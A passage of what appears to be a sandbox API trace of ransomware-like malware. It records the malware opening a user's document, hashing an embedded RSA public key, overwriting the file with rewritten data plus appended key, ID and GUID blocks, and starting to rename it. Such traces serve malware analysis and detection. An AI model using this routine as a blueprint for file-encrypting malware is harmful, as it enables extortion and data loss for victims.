OhJavw.pps") returned=".pps" [0206.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\Ta4tu7_MhJ OhJavw.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\ta4tu7_mhj ohjavw.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.327] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=43711) returned 1 [0206.327] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.329] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaa99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.329] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.330] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.330] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xaabf, lpOverlapped=0x0) returned 1 [0206.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.331] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.332] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.332] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.332] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.332] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.332] GetLastError () returned 0x0 [0206.332] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.332] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.332] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.332] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.333] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xaac0) returned 0x3b87c98 [0206.333] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86dd0 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86e18 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b48 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b90 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.333] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b90 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79b90 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79b78 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72ec8 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72fe0 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b90 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.335] GetCurrentThreadId () returned 0x600 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7a968 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.335] GetCurrentThreadId () returned 0x600 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0206.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b90 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b60 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bd8 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ba8 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bf0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72c98 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72db0 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bd8 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b90 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b60 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b48 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b86e18 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fe0 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.339] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0xaaba, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0xaaba, lpOverlapped=0x0) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0206.339] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaabf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.339] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.339] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.340] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.340] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.340] CloseHandle (hObject=0x63c) returned 1 [0206.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0206.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x3b7b950 [0206.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.341] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F 